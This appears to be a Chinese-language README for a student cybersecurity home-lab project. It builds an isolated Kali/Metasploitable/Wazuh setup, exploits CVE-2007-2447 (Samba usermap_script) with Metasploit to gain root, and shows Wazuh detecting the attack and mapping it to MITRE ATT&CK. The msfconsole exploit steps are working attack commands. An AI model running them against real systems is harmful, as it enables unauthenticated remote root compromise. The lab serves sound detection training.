隔离的AD/Linux攻击实验室:通过Metasploit利用CVE-2007-2447,使用Wazuh SIEM检测并映射到MITRE ATT&CK(T1190, T1059)
学士学位项目 (BTP) | IIIT Pune 基于:"设计和实施一个有效的网络安全家庭实验室用于检测和监控" — ICCCNT 2023, IIT Delhi
一个完全功能化的网络安全家庭实验室,构建在单台机器上,使用免费开源工具。该实验室模拟真实攻击生命周期 — 侦察 → 利用 → 检测 — 并展示 SIEM 如何实时检测攻击并将其映射到 MITRE ATT&CK 框架。
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| VM | 角色 | IP | 工具 |
|---|---|---|---|
| Kali Linux 2026.1 | 攻击者 | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | 受害者 | 10.0.0.2 | 20+ 漏洞 |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
在 VirtualBox 中创建一个名为 cyberlab 的 内部网络。所有三台虚拟机都使用此适配器。Ubuntu/Wazuh 虚拟机额外使用一个 仅主机适配器,以便您可以从浏览器访问仪表板。
cyberlab 内部网络适配器# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab 网络# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ 切勿将 Metasploitable 2 暴露到互联网。 它故意存在安全隐患。
cyberlab 内部网络 + 仅主机/etc/netplan/01-network-manager-all.yaml)配置静态 IP:network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103(从宿主机浏览器)由于 Metasploitable 2 无法运行 Wazuh 代理,配置 syslog 转发 实现无代理监控:
在 Metasploitable 上,添加至 /etc/rsyslog.conf:
*.* @10.0.0.3:514
在 Wazuh(Ubuntu)上,启用 /var/ossec/etc/ossec.conf 中的 syslog 输入:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
重启 Wazuh:sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
在 Metasploitable 2 上发现的关键服务:
发现 20+ 开放端口。操作系统指纹识别:Linux 2.6.x
漏洞: CVE-2007-2447 — Samba usermap_script 命令注入
允许通过 Samba 3.0.0–3.0.25rc3 上格式错误的 MS-RPC 请求进行未经身份验证的远程代码执行。
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
漏洞利用后,Wazuh 自动检测并将事件映射到 MITRE ATT&CK:
检测到的事件总数:55+
访问仪表板 https://192.168.56.103 → 安全事件 → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← 你在这里
├── network-config/
│ ├── kali-interfaces.txt ← Kali 静态 IP 配置
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan 配置
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent 配置
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← 参考研究论文
Dadiyala, C. 等 (2023). 设计和实施一个有效的网络安全家庭实验室用于检测和监控. 第14届计算、通信与网络技术国际会议 (ICCCNT), IIT Delhi. IEEE-56998.
本实验室完全构建在隔离的虚拟机上,攻击模拟期间无互联网访问。所有工具和技术仅在受控环境中用于教育目的。请勿在您未拥有或未经明确许可的系统上尝试复制任何攻击技术。
由 Harshita Verma 呈现 | IIIT Pune
| 工具 | 版本 | 用途 |
|---|
| VirtualBox | 7.x | 虚拟机监控程序 — 在一台主机上运行所有虚拟机 |
| Kali Linux | 2026.1 | 渗透测试操作系统(攻击方) |
| Metasploitable 2 | v2.0 | 故意存在漏洞的目标 |
| Wazuh | v4.7.5 | 开源SIEM(防御方) |
| Nmap | 最新版 | 网络/端口扫描 |
| Metasploit Framework | 最新版 | 漏洞利用框架 |
| 端口 | 服务 | 版本 |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| 规则 ID | 描述 | MITRE 技术 | 战术 |
|---|
| 5402 | 成功执行 sudo 到 ROOT | T1548.003 | 权限提升 |
| 5501 | PAM:登录会话已打开 | T1078 | 初始访问 / 持久化 |
| 5502 | PAM:登录会话已关闭 | T1078 | 防御规避 |
| 502 | Wazuh 服务器已启动 | — | 检测活动 |